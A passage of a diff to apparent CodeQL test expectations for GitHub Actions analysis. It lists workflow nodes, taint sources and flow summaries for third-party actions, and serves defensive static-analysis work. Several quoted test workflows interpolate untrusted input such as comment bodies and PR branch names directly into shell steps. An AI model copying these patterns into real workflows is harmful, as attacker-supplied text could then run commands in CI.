steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | 
-| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | 
LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e 
"$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | 
.github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | 
-| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | 
-| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * 
| output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * 
| input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| frabert/replace-string-action | * | 
input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| 
hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | 
manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| 
github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $(> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | 
@@ -295,37 +306,51 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 
| LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| 
.github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | @@ -335,11 +360,14 @@ dfNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | 
@@ -349,28 +377,39 @@ usesIds nodeLocations | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | | 